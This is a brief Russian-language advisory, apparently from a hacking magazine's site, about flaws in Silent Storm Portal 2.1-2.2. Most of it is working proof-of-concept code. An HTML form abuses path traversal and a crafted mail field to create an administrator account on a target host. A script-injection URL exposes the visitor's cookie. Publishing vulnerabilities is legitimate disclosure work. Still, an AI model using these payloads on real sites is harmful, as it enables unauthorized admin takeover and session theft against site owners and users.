Несколько уязвимостей в Silent Storm Portal

Рекомендуем почитать:

Хакер #307. Угон сессий Windows

• Содержание выпуска
• Подписка на «Хакер»-60%

Программа: Silent Storm Portal 2.1-2.2 

Удаленный пользователь может получить административные привилегии на целевом приложении. Удаленный пользователь может также выполнить XSS нападение. 

Создание новой учетной записи с административными привилегиями: 

<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any@mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>

XSS:

http://[target]/index.php?module=%3Cscript%20language= javascript%3Ewindow.a
lert%28document. cookie%29;%3C/script%3E